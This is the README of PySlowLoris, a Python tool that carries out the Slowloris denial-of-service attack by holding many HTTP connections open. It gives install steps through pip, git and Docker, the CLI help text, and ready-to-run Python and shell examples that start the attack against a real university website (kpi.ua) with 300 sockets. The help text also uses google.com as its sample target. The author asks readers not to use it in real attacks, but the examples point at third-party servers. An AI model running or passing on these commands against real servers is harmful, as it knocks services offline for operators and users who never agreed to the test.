This repository was created for testing Slow Loris vulnerability on different web servers. SL based on keeping alive open connection as long as possible and sending some trash headers to the server. If you are interested what I'm trying doing here, please join my team and let's do fun together. Please DO NOT use this in the real attacks on the servers.
The main reason why I'm writing this module it is to create the easy tool for the fast check a small personal or corporate web server what based on Apache and etc. Also, last but not least reason is to improve my skills in this sphere.
More information you can find here.
To install PySlowLoris, run this command in your terminal:
$ pip install pyslowloris
This is the preferred method to install PySlowLoris, as it will always install the most recent stable release.
In case you downloaded or cloned the source code from GitHub or your own fork, you can run the following to install cameo for development:
$ git clone https://github.com/[username]/SlowLoris.git
$ cd SlowLoris
$ virtualenv --python=python[version] venv
$ source venv/bin/active
$ pip install --editable .
Pulling image from Docker Hub and run container:
$ docker pull maxkrivich/pyslowloris
$ docker run --rm -it maxkrivich/pyslowloris [-h] [-u URL] [-p PORT] [-s SOCKET_COUNT]
Also you can build image from Dockerfile and run container:
$ docker build -t pyslowloris .
$ docker run --rm -it pyslowloris [-h] [-u URL] [-p PORT] [-s SOCKET_COUNT]
Note: Don't forget about 'sudo'!
Available command list:
$ slowloris --help
usage: slowloris [-h] [-u URL] [-s SOCKET_COUNT] [-p PORT]
Small and simple tool for testing Slow Loris vulnerability
optional arguments:
-h show this help message and exit
-u URL link to the web server (http://google.com) - str
-s SOCKET_COUNT maximum count of created connection (default value 300) - int
-p PORT port what will be used - int
Here are some example to start attack from Python code
import time
from PySlowLoris import TargetInfo, SlowLorisAttack
target = TargetInfo(url="http://kpi.ua/", port=80)
target.get_info()
slowloris = SlowLorisAttack(target)
slowloris.start_attack() # stop_attack()
while True:
time.sleep(1)
The following command helps to use module from command line
$ slowloris -u http://kpi.ua/ -s 300
If you find bugs or have suggestions about improving the module, don't hesitate to contact me.
This project is licensed under the MIT License - see the LICENSE file for details
Copyright (c) 2017 Maxim Krivich